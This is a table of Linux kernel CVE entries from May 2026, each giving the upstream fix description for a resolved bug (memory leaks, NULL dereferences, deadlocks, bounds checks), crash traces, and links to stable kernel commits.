| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: starfive - Fix memory leak in starfive_aes_aead_do_one_req() The starfive_aes_aead_do_one_req() function allocates rctx->adata with kzalloc() but fails to free it if sg_copy_to_buffer() or starfive_aes_hw_init() fails, which leads to memory leaks. Since rctx->adata is unconditionally freed after the write_adata operations, ensure consistent cleanup by freeing the allocation in these earlier error paths as well. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45950 | https://git.kernel.org/stable/c/38d80307decc1132626a30e2a62af734630ecca5 https://git.kernel.org/stable/c/4869d0e4e48a5301b267d359b2561c4080791a55 https://git.kernel.org/stable/c/5f2c964a058581e1557c32d5de651c67a80438a7 https://git.kernel.org/stable/c/ccb679fdae2e62ed92fd9acb25ed809c0226fcc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eth: fbnic: Add validation for MTU changes Increasing the MTU beyond the HDS threshold causes the hardware to fragment packets across multiple buffers. If a single-buffer XDP program is attached, the driver will drop all multi-frag frames. While we can't prevent a remote sender from sending non-TCP packets larger than the MTU, this will prevent users from inadvertently breaking new TCP streams. Traditionally, drivers supported XDP with MTU less than 4Kb (packet per page). Fbnic currently prevents attaching XDP when MTU is too high. But it does not prevent increasing MTU after XDP is attached. | 2026-05-27 | not yet calculated | CVE-2026-45952 | https://git.kernel.org/stable/c/d7eaa006c0444a5d4671be7efe6dbb33ef8b515e https://git.kernel.org/stable/c/03399063aa0c67fd8bdfd69467ddb849bb3b97df https://git.kernel.org/stable/c/ccd8e87748ad083047d6c8544c5809b7f96cc8df |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix IO hang with degraded array with llbitmap When llbitmap bit state is still unwritten, any new write should force rcw, as bitmap_ops->blocks_synced() is checked in handle_stripe_dirtying(). However, later the same check is missing in need_this_block(), causing stripe to deadloop during handling because handle_stripe() will decide to go to handle_stripe_fill(), meanwhile need_this_block() always return 0 and nothing is handled. | 2026-05-27 | not yet calculated | CVE-2026-45953 | https://git.kernel.org/stable/c/870b9f15867b0e70f3459ef3974b043e8b229690 https://git.kernel.org/stable/c/28ef299e7a5b81817f8ca8297c2ddff28f5da5e8 https://git.kernel.org/stable/c/cd1635d844d26471c56c0a432abdee12fc9ad735 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: au1200fb: Fix a memory leak in au1200fb_drv_probe() In au1200fb_drv_probe(), when platform_get_irq() fails, it directly returns from the function with an error code, which causes a memory leak. Replace it with a goto label to ensure proper cleanup. | 2026-05-27 | not yet calculated | CVE-2026-45954 | https://git.kernel.org/stable/c/81831d56b723bc1090ce3158feddaca88e85f939 https://git.kernel.org/stable/c/071d8fb757a8318f72c8e02898c2cf7e14e21fb6 https://git.kernel.org/stable/c/bd1ad63e11b2a568e98de536f319054d2de29f56 https://git.kernel.org/stable/c/3e5349e54113e2dce1a659c57935e18032742e56 https://git.kernel.org/stable/c/762a26818934241b8b0172a229d2cf5d87260e40 https://git.kernel.org/stable/c/3d4202ee6494c0d576cdc104b12e0834ca8136a8 https://git.kernel.org/stable/c/b024a8efee0f55d330a1cdd3eac8f79ac5acd3be https://git.kernel.org/stable/c/ce4e25198a6aaaaf36248edf8daf3d744ec8e309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: fix percpu_ref not resurrected on suspend timeout When llbitmap_suspend_timeout() times out waiting for percpu_ref to become zero, it returns -ETIMEDOUT without resurrecting the percpu_ref. The caller (md_llbitmap_daemon_fn) then continues to the next page without calling llbitmap_resume(), leaving the percpu_ref in a killed state permanently. Fix this by resurrecting the percpu_ref before returning the error, ensuring the page control structure remains usable for subsequent operations. | 2026-05-27 | not yet calculated | CVE-2026-45955 | https://git.kernel.org/stable/c/095417d6b669c2dec39a5842ccb94df915f97f54 https://git.kernel.org/stable/c/2446d099350185caeed19ab2c0270451a97296fb https://git.kernel.org/stable/c/d119bd2e1643cc023210ff3c6f0657e4f914e71d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: use priv->vidi_dev for ctx lookup in vidi_connection_ioctl() vidi_connection_ioctl() retrieves the driver_data from drm_dev->dev to obtain a struct vidi_context pointer. However, drm_dev->dev is the exynos-drm master device, and the driver_data contained therein is not the vidi component device, but a completely different device. This can lead to various bugs, ranging from null pointer dereferences and garbage value accesses to, in unlucky cases, out-of-bounds errors, use-after-free errors, and more. To resolve this issue, we need to store/delete the vidi device pointer in exynos_drm_private->vidi_dev during bind/unbind, and then read this exynos_drm_private->vidi_dev within ioctl() to obtain the correct struct vidi_context pointer. | 2026-05-27 | not yet calculated | CVE-2026-45956 | https://git.kernel.org/stable/c/2987642c5213508c6c9e718324c0d5289a92c474 https://git.kernel.org/stable/c/65d1213baffa363f2eb1117b1dc7acc573b890f8 https://git.kernel.org/stable/c/875fa28690e93ed5296c31d3344556c6bb867234 https://git.kernel.org/stable/c/21ca24ba51a2c28bcc4df9d7e5a40b0eb66ab76d https://git.kernel.org/stable/c/b5fc86d753dd4c281a943b92f0eef02d31af03d7 https://git.kernel.org/stable/c/a540f767642f75240a6c35f6a65b69e44cfcea9d https://git.kernel.org/stable/c/d3968a0d85b211e197f2f4f06268a7031079e0d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: Fix rcu_read_unlock() deadloop due to softirq Commit 5f5fa7ea89dc ("rcu: Don't use negative nesting depth in __rcu_read_unlock()") removes the recursion-protection code from __rcu_read_unlock(). Therefore, we could invoke the deadloop in raise_softirq_irqoff() with ftrace enabled as follows: WARNING: CPU: 0 PID: 0 at kernel/trace/trace.c:3021 __ftrace_trace_stack.constprop.0+0x172/0x180 Modules linked in: my_irq_work(O) CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.18.0-rc7-dirty #23 PREEMPT(full) Tainted: [O]=OOT_MODULE Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:__ftrace_trace_stack.constprop.0+0x172/0x180 RSP: 0018:ffffc900000034a8 EFLAGS: 00010002 RAX: 0000000000000000 RBX: 0000000000000004 RCX: 0000000000000000 RDX: 0000000000000003 RSI: ffffffff826d7b87 RDI: ffffffff826e9329 RBP: 0000000000090009 R08: 0000000000000005 R09: ffffffff82afbc4c R10: 0000000000000008 R11: 0000000000011d7a R12: 0000000000000000 R13: ffff888003874100 R14: 0000000000000003 R15: ffff8880038c1054 FS: 0000000000000000(0000) GS:ffff8880fa8ea000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055b31fa7f540 CR3: 00000000078f4005 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: <IRQ> trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 __is_insn_slot_addr+0x54/0x70 kernel_text_address+0x48/0xc0 __kernel_text_address+0xd/0x40 unwind_get_return_address+0x1e/0x40 arch_stack_walk+0x9c/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 __raise_softirq_irqoff+0x61/0x80 __flush_smp_call_function_queue+0x115/0x420 __sysvec_call_function_single+0x17/0xb0 sysvec_call_function_single+0x8c/0xc0 </IRQ> Commit b41642c87716 ("rcu: Fix rcu_read_unlock() deadloop due to IRQ work") fixed the infinite loop in rcu_read_unlock_special() for IRQ work by setting a flag before calling irq_work_queue_on(). We fix this issue by setting the same flag before calling raise_softirq_irqoff() and rename the flag to defer_qs_pending to make it more generic. | 2026-05-27 | not yet calculated | CVE-2026-45957 | https://git.kernel.org/stable/c/979c708e6c9d7fc461daef2dad8b45f22e23464c https://git.kernel.org/stable/c/1f16679a5aa60238466ce339c35f5e82ece60337 https://git.kernel.org/stable/c/4a4a6e12c9c829be3f74b7206fa8640fc4e1c566 https://git.kernel.org/stable/c/c2932e16d8c354404b17123e64daa8e33191e145 https://git.kernel.org/stable/c/d41e37f26b3157b3f1d10223863519a943aa239b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: return error when node already exists in hfs_bnode_create When hfs_bnode_create() finds that a node is already hashed (which should not happen in normal operation), it currently returns the existing node without incrementing its reference count. This causes a reference count inconsistency that leads to a kernel panic when the node is later freed in hfs_bnode_put(): kernel BUG at fs/hfsplus/bnode.c:676! BUG_ON(!atomic_read(&node->refcnt)) This scenario can occur when hfs_bmap_alloc() attempts to allocate a node that is already in use (e.g., when node 0's bitmap bit is incorrectly unset), or due to filesystem corruption. Returning an existing node from a create path is not normal operation. Fix this by returning ERR_PTR(-EEXIST) instead of the node when it's already hashed. This properly signals the error condition to callers, which already check for IS_ERR() return values. | 2026-05-27 | not yet calculated | CVE-2026-45960 | https://git.kernel.org/stable/c/1ca428769cb4737a25bd32fb4d1573cc09eeaeef https://git.kernel.org/stable/c/507a1de58c21c95ad7c44afccaf1222d1c42246b https://git.kernel.org/stable/c/986455135b95f32c1f142068e451098fc751749e https://git.kernel.org/stable/c/7b57ada854b32310f224abd61bcfec2d5790ff0a https://git.kernel.org/stable/c/51838112d9c22502333c3085ca0c0d691e7093c6 https://git.kernel.org/stable/c/2e6ff6a6fc69cc17ed10c9cb6242935d52acd52d https://git.kernel.org/stable/c/2e9185a42e0e237c74435fd092b7c34537c62156 https://git.kernel.org/stable/c/d8a73cc46c8462a969a7516131feb3096f4c49d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: fix memory leaks in gfs2_fill_super error path Fix two memory leaks in the gfs2_fill_super() error handling path when transitioning a filesystem to read-write mode fails. First leak: kthread objects (thread_struct, task_struct, etc.) When gfs2_freeze_lock_shared() fails after init_threads() succeeds, the created kernel threads (logd and quotad) are never destroyed. This occurs because the fail_per_node label doesn't call gfs2_destroy_threads(). Second leak: quota bitmap buffer (8192 bytes) When gfs2_make_fs_rw() fails after gfs2_quota_init() succeeds but before other operations complete, the allocated quota bitmap is never freed. The fix moves thread cleanup to the fail_per_node label to handle all error paths uniformly. gfs2_destroy_threads() is safe to call unconditionally as it checks for NULL pointers. Quota cleanup is added in gfs2_make_fs_rw() to properly handle the withdrawal case where quota initialization succeeds but the filesystem is then withdrawn. Thread leak backtrace (gfs2_freeze_lock_shared failure): unreferenced object 0xffff88801d7bca80 (size 4480): copy_process+0x3a1/0x4670 kernel/fork.c:2422 kernel_clone+0xf3/0x6e0 kernel/fork.c:2779 kthread_create_on_node+0x100/0x150 kernel/kthread.c:478 init_threads+0xab/0x350 fs/gfs2/ops_fstype.c:611 gfs2_fill_super+0xe5c/0x1240 fs/gfs2/ops_fstype.c:1265 Quota leak backtrace (gfs2_make_fs_rw failure): unreferenced object 0xffff88812de7c000 (size 8192): gfs2_quota_init+0xe5/0x820 fs/gfs2/quota.c:1409 gfs2_make_fs_rw+0x7a/0xe0 fs/gfs2/super.c:149 gfs2_fill_super+0xfbb/0x1240 fs/gfs2/ops_fstype.c:1275 | 2026-05-27 | not yet calculated | CVE-2026-45961 | https://git.kernel.org/stable/c/e54229ecf49add8451d5f765a32c86ab4446e06c https://git.kernel.org/stable/c/da6f5bbc2e7902f578b503f2a4c3d8d09ca4b102 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: Validate SQE128 flag before accessing the cmd ublk_ctrl_cmd_dump() accesses (header *)sqe->cmd before the IO_URING_F_SQE128 flag check. This could cause an out-of-bounds memory access. Move the SQE128 flag check earlier in ublk_ctrl_uring_cmd() to return -EINVAL immediately if the flag is not set. | 2026-05-27 | not yet calculated | CVE-2026-45962 | https://git.kernel.org/stable/c/4b4dff498f46e9802f71bc84258bf73065f51c6a https://git.kernel.org/stable/c/31cac6acf77ece488f29fb8f79589d9298e969c8 https://git.kernel.org/stable/c/dbe8e81a2ec608f87f79a34f6444cd62f6a243bb https://git.kernel.org/stable/c/f75a5555e0049e7857eae25b60aee98b80e287ec https://git.kernel.org/stable/c/17d33ba7291100008360b5a354962db37ad80684 https://git.kernel.org/stable/c/da7e4b75e50c087d2031a92f6646eb90f7045a67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: nau8821: Cancel delayed work on component remove Attempting to unload the driver while a jack detection work is pending would likely crash the kernel when it is eventually scheduled for execution: [ 1984.896308] BUG: unable to handle page fault for address: ffffffffc10c2a20 [...] [ 1984.896388] Hardware name: Valve Jupiter/Jupiter, BIOS F7A0131 01/30/2024 [ 1984.896396] Workqueue: events nau8821_jdet_work [snd_soc_nau8821] [ 1984.896414] RIP: 0010:__mutex_lock+0x9f/0x11d0 [...] [ 1984.896504] Call Trace: [ 1984.896511] <TASK> [ 1984.896524] ? snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896572] ? snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896596] snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896622] nau8821_jdet_work+0xeb/0x1e0 [snd_soc_nau8821] [ 1984.896636] process_one_work+0x211/0x590 [ 1984.896649] ? srso_return_thunk+0x5/0x5f [ 1984.896670] worker_thread+0x1cd/0x3a0 Cancel unscheduled jdet_work or wait for its execution to finish before the component driver gets removed. | 2026-05-27 | not yet calculated | CVE-2026-45963 | https://git.kernel.org/stable/c/3955767ec39dcc0358470ffe6535703e2b7fd815 https://git.kernel.org/stable/c/dbd3fd05cddfdeec1e49b0a66269881c09eebd17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: fix gss_auth kref leak in gss_alloc_msg error path Commit 5940d1cf9f42 ("SUNRPC: Rebalance a kref in auth_gss.c") added a kref_get(&gss_auth->kref) call to balance the gss_put_auth() done in gss_release_msg(), but forgot to add a corresponding kref_put() on the error path when kstrdup_const() fails. If service_name is non-NULL and kstrdup_const() fails, the function jumps to err_put_pipe_version which calls put_pipe_version() and kfree(gss_msg), but never releases the gss_auth reference. This leads to a kref leak where the gss_auth structure is never freed. Add a forward declaration for gss_free_callback() and call kref_put() in the err_put_pipe_version error path to properly release the reference taken earlier. | 2026-05-27 | not yet calculated | CVE-2026-45964 | https://git.kernel.org/stable/c/3b2b6c42070ce4204936288253baf101e995c2d3 https://git.kernel.org/stable/c/b559be2ec6cdb2e9c2c36c23fbbd4690d8a5c3f7 https://git.kernel.org/stable/c/a1bc9561b617ec7e2d09e6c134d1db8fcf9ca4a6 https://git.kernel.org/stable/c/655c9ba9915f05266998dbbf4b76b3c79b8a70aa https://git.kernel.org/stable/c/e464e26b2457005c87e158570498274b9f3b90c7 https://git.kernel.org/stable/c/c20f925214249bb4fc04f7e197bea142a6438af6 https://git.kernel.org/stable/c/a2d4e9a76de0b2178001214ba5de5bf94a7354aa https://git.kernel.org/stable/c/dd2fdc3504592d85e549c523b054898a036a6afe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix invalid deref of rawdata when export_binary is unset If the export_binary parameter is disabled at runtime, profiles that were loaded before that will still have their rawdata stored in apparmorfs, with a symbolic link to the rawdata in the policy directory. When one of those profiles is replaced, the rawdata is set to NULL, but when trying to resolve the symbolic links to rawdata for that profile, it will try to dereference profile->rawdata->name when profile->rawdata is now NULL, causing an oops. Fix it by checking if rawdata is set. [ 168.653080] BUG: kernel NULL pointer dereference, address: 0000000000000088 [ 168.657420] #PF: supervisor read access in kernel mode [ 168.660619] #PF: error_code(0x0000) - not-present page [ 168.663613] PGD 0 P4D 0 [ 168.665450] Oops: Oops: 0000 [#1] SMP NOPTI [ 168.667836] CPU: 1 UID: 0 PID: 1729 Comm: ls Not tainted 6.19.0-rc7+ #3 PREEMPT(voluntary) [ 168.672308] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 168.679327] RIP: 0010:rawdata_get_link_base.isra.0+0x23/0x330 [ 168.682768] Code: 90 90 90 90 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 18 48 89 55 d0 48 85 ff 0f 84 e3 01 00 00 <48> 83 3c 25 88 00 00 00 00 0f 84 d4 01 00 00 49 89 f6 49 89 cc e8 [ 168.689818] RSP: 0018:ffffcdcb8200fb80 EFLAGS: 00010282 [ 168.690871] RAX: ffffffffaee74ec0 RBX: 0000000000000000 RCX: ffffffffb0120158 [ 168.692251] RDX: ffffcdcb8200fbe0 RSI: ffff88c187c9fa80 RDI: ffff88c186c98a80 [ 168.693593] RBP: ffffcdcb8200fbc0 R08: 0000000000000000 R09: 0000000000000000 [ 168.694941] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88c186c98a80 [ 168.696289] R13: 00007fff005aaa20 R14: 0000000000000080 R15: ffff88c188f4fce0 [ 168.697637] FS: 0000790e81c58280(0000) GS:ffff88c20a957000(0000) knlGS:0000000000000000 [ 168.699227] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 168.700349] CR2: 0000000000000088 CR3: 000000012fd3e000 CR4: 0000000000350ef0 [ 168.701696] Call Trace: [ 168.702325] <TASK> [ 168.702995] rawdata_get_link_data+0x1c/0x30 [ 168.704145] vfs_readlink+0xd4/0x160 [ 168.705152] do_readlinkat+0x114/0x180 [ 168.706214] __x64_sys_readlink+0x1e/0x30 [ 168.708653] x64_sys_call+0x1d77/0x26b0 [ 168.709525] do_syscall_64+0x81/0x500 [ 168.710348] ? do_statx+0x72/0xb0 [ 168.711109] ? putname+0x3e/0x80 [ 168.711845] ? __x64_sys_statx+0xb7/0x100 [ 168.712711] ? x64_sys_call+0x10fc/0x26b0 [ 168.713577] ? do_syscall_64+0xbf/0x500 [ 168.714412] ? do_user_addr_fault+0x1d2/0x8d0 [ 168.715404] ? irqentry_exit+0xb2/0x740 [ 168.716359] ? exc_page_fault+0x90/0x1b0 [ 168.717307] entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2026-05-27 | not yet calculated | CVE-2026-45965 | https://git.kernel.org/stable/c/e6b2fc7e34d4e7ca6b8598c33a3d45d59e455d8d https://git.kernel.org/stable/c/6d8c180c825cbc73eeffaa79591f8e142dacae70 https://git.kernel.org/stable/c/3c36b87fc2a4cf88eadea8cf13923bd2b4f9a3fa https://git.kernel.org/stable/c/b25298e89a297c42eb4c4d6f081d60375b820abb https://git.kernel.org/stable/c/19f2e4055626a58842ddec3282ad4465a80c6625 https://git.kernel.org/stable/c/1d2b2b58fde9059a488bc25399e6c3d74e9b5548 https://git.kernel.org/stable/c/1432ab0774cba43e8111be39989ff226531a9bac https://git.kernel.org/stable/c/df9ac55abd18628bd8cff687ea043660532a3654 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix NULL pointer dereference in __unix_needs_revalidation When receiving file descriptors via SCM_RIGHTS, both the socket pointer and the socket's sk pointer can be NULL during socket setup or teardown, causing NULL pointer dereferences in __unix_needs_revalidation(). This is a regression in AppArmor 5.0.0 (kernel 6.17+) where the new __unix_needs_revalidation() function was added without proper NULL checks. The crash manifests as: BUG: kernel NULL pointer dereference, address: 0x0000000000000018 RIP: aa_file_perm+0xb7/0x3b0 (or +0xbe/0x3b0, +0xc0/0x3e0) Call Trace: apparmor_file_receive+0x42/0x80 security_file_receive+0x2e/0x50 receive_fd+0x1d/0xf0 scm_detach_fds+0xad/0x1c0 The function dereferences sock->sk->sk_family without checking if either sock or sock->sk is NULL first. Add NULL checks for both sock and sock->sk before accessing sk_family. | 2026-05-27 | not yet calculated | CVE-2026-45966 | https://git.kernel.org/stable/c/fea017a7f6abe179decf575a2d8464c74edb3964 https://git.kernel.org/stable/c/e85bc9101afc4202aa2269967ce9d3ffbecd0994 https://git.kernel.org/stable/c/e2938ad00b21340c0362562dfedd7cfec0554d67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Return proper address for non-zero offsets in insn array The map_direct_value_addr() function of the instruction array map incorrectly adds the offset to the resulting address. This is a bug, because the resolve_pseudo_ldimm64() function later adds the offset as well. Fix it. Corresponding selftests are added in a subsequent commit. | 2026-05-27 | not yet calculated | CVE-2026-45967 | https://git.kernel.org/stable/c/73ef43202a37d779a8e665a0acae214fa59df9fb https://git.kernel.org/stable/c/e3bd7bdf5ffe49d8381e42843f6e98cd0c78a1e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpuidle: Skip governor when only one idle state is available On certain platforms (PowerNV systems without a power-mgt DT node), cpuidle may register only a single idle state. In cases where that single state is a polling state (state 0), the ladder governor may incorrectly treat state 1 as the first usable state and pass an out-of-bounds index. This can lead to a NULL enter callback being invoked, ultimately resulting in a system crash. [ 13.342636] cpuidle-powernv : Only Snooze is available [ 13.351854] Faulting instruction address: 0x00000000 [ 13.376489] NIP [0000000000000000] 0x0 [ 13.378351] LR [c000000001e01974] cpuidle_enter_state+0x2c4/0x668 Fix this by adding a bail-out in cpuidle_select() that returns state 0 directly when state_count <= 1, bypassing the governor and keeping the tick running. | 2026-05-27 | not yet calculated | CVE-2026-45968 | https://git.kernel.org/stable/c/a0f7e804edc82e513d1ccb7c95ed8b351522ec81 https://git.kernel.org/stable/c/5d103a38e2ae96eca57fd17161bcd29bd4622d1c https://git.kernel.org/stable/c/4da2b897283c39980d6ae09dc1560fcd937879e5 https://git.kernel.org/stable/c/5c577ac939bca486cb02069505cfe47a5312ce02 https://git.kernel.org/stable/c/8f6833d919bae915ead6c599a53e81e19b32da52 https://git.kernel.org/stable/c/63ae78336f40bcd9a44952a7c6bafb9c88a8effd https://git.kernel.org/stable/c/a0724e40a58a0e323c59707edeae5b71d15800dc https://git.kernel.org/stable/c/e5c9ffc6ae1bcdb1062527d611043681ac301aca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: playstation: Add missing check for input_ff_create_memless The ps_gamepad_create() function calls input_ff_create_memless() without verifying its return value, which can lead to incorrect behavior or potential crashes when FF effects are triggered. Add a check for the return value of input_ff_create_memless(). | 2026-05-27 | not yet calculated | CVE-2026-45969 | https://git.kernel.org/stable/c/496a345cc047a2c2d9d5a76956e1182525578bd5 https://git.kernel.org/stable/c/987dee1486e975e2baa6a5d062cfdf18bbe901c8 https://git.kernel.org/stable/c/33acf9a4d6eb1f6d01691faca96ad6b2ab0fcfc0 https://git.kernel.org/stable/c/d955aeb26e1210a018492b3b32cbdfaf017aaa25 https://git.kernel.org/stable/c/35301ca2a83d17aac2f3e8e35c696f0da2a13111 https://git.kernel.org/stable/c/45b01d85265bc1ccdd69e0a7887db4b905a778f4 https://git.kernel.org/stable/c/e6807641ac94e832988655a1c0e60ccc806b76dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Limit bpf program signature size Practical BPF signatures are significantly smaller than KMALLOC_MAX_CACHE_SIZE. Allowing larger sizes opens the door for abuse by passing excessive size values and forcing the kernel into expensive allocation paths (via kmalloc_large or vmalloc). | 2026-05-27 | not yet calculated | CVE-2026-45971 | https://git.kernel.org/stable/c/5835a077c6f5c565d525eaca9fac01572b97a9b9 https://git.kernel.org/stable/c/eb8166c79097996396468a341de258a798789d36 https://git.kernel.org/stable/c/ea1535e28bb3773fc0b3cbd1f3842b808016990c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix UMR hang in LAG error state unload During firmware reset in LAG mode, a race condition causes the driver to hang indefinitely while waiting for UMR completion during device unload. See [1]. In LAG mode the bond device is only registered on the master, so it never sees sys_error events from the slave. During firmware reset this causes UMR waits to hang forever on unload as the slave is dead but the master hasn't entered error state yet, so UMR posts succeed but completions never arrive. Fix this by adding a sys_error notifier that gets registered before MLX5_IB_STAGE_IB_REG and stays alive until after ib_unregister_device(). This ensures error events reach the bond device throughout teardown. [1] Call Trace: __schedule+0x2bd/0x760 schedule+0x37/0xa0 schedule_preempt_disabled+0xa/0x10 __mutex_lock.isra.6+0x2b5/0x4a0 __mlx5_ib_dereg_mr+0x606/0x870 [mlx5_ib] ? __xa_erase+0x4a/0xa0 ? _cond_resched+0x15/0x30 ? wait_for_completion+0x31/0x100 ib_dereg_mr_user+0x48/0xc0 [ib_core] ? rdmacg_uncharge_hierarchy+0xa0/0x100 destroy_hw_idr_uobject+0x20/0x50 [ib_uverbs] uverbs_destroy_uobject+0x37/0x150 [ib_uverbs] __uverbs_cleanup_ufile+0xda/0x140 [ib_uverbs] uverbs_destroy_ufile_hw+0x3a/0xf0 [ib_uverbs] ib_uverbs_remove_one+0xc3/0x140 [ib_uverbs] remove_client_context+0x8b/0xd0 [ib_core] disable_device+0x8c/0x130 [ib_core] __ib_unregister_device+0x10d/0x180 [ib_core] ib_unregister_device+0x21/0x30 [ib_core] __mlx5_ib_remove+0x1e4/0x1f0 [mlx5_ib] auxiliary_bus_remove+0x1e/0x30 device_release_driver_internal+0x103/0x1f0 bus_remove_device+0xf7/0x170 device_del+0x181/0x410 mlx5_rescan_drivers_locked.part.10+0xa9/0x1d0 [mlx5_core] mlx5_disable_lag+0x253/0x260 [mlx5_core] mlx5_lag_disable_change+0x89/0xc0 [mlx5_core] mlx5_eswitch_disable+0x67/0xa0 [mlx5_core] mlx5_unload+0x15/0xd0 [mlx5_core] mlx5_unload_one+0x71/0xc0 [mlx5_core] mlx5_sync_reset_reload_work+0x83/0x100 [mlx5_core] process_one_work+0x1a7/0x360 worker_thread+0x30/0x390 ? create_worker+0x1a0/0x1a0 kthread+0x116/0x130 ? kthread_flush_work_fn+0x10/0x10 ret_from_fork+0x22/0x40 | 2026-05-27 | not yet calculated | CVE-2026-45973 | https://git.kernel.org/stable/c/c8fb5c965ac7d0104872a8e4f6451f3bc6328199 https://git.kernel.org/stable/c/6d838873da9cb97551d42316967cc82bf8f8031b https://git.kernel.org/stable/c/613f5d4139b6ba801ccd93f9a28943be60d903bc https://git.kernel.org/stable/c/ebc2164a4cd4314503f1a0c8e7aaf76d7e5fa211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix invalid leaf access in btrfs_quota_enable() if ref key not found If btrfs_search_slot_for_read() returns 1, it means we did not find any key greater than or equal to the key we asked for, meaning we have reached the end of the tree and therefore the path is not valid. If this happens we need to break out of the loop and stop, instead of continuing and accessing an invalid path. | 2026-05-27 | not yet calculated | CVE-2026-45974 | https://git.kernel.org/stable/c/023545e272f369d487e6a986c1e321c6e04be1da https://git.kernel.org/stable/c/fd4913a53e3b54ad7e161847291439fe445d6356 https://git.kernel.org/stable/c/b5b8ade9da452086e78f5d519b90d3769e354853 https://git.kernel.org/stable/c/1ee1d006c9fe4d6be5527ab1c84216b80cccbe40 https://git.kernel.org/stable/c/0761447f6f51e1c7997960d8e6559337deed6729 https://git.kernel.org/stable/c/d7cf2314dd5e8661c05d076cd627eea9a7f76616 https://git.kernel.org/stable/c/b2bd557b75b760e4b9d209112bda19314bd64558 https://git.kernel.org/stable/c/ecb7c2484cfc83a93658907580035a8adf1e0a92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: use READ_ONCE() to read struct ublksrv_ctrl_cmd struct ublksrv_ctrl_cmd is part of the io_uring_sqe, which may lie in userspace-mapped memory. It's racy to access its fields with normal loads, as userspace may write to them concurrently. Use READ_ONCE() to copy the ublksrv_ctrl_cmd from the io_uring_sqe to the stack. Use the local copy in place of the one in the io_uring_sqe. | 2026-05-27 | not yet calculated | CVE-2026-45975 | https://git.kernel.org/stable/c/ce63eda3e6d36e2c253febee1c8421ecbd1a680e https://git.kernel.org/stable/c/ed9f54cc1e335096733aed03c2a46de3d58922ed |
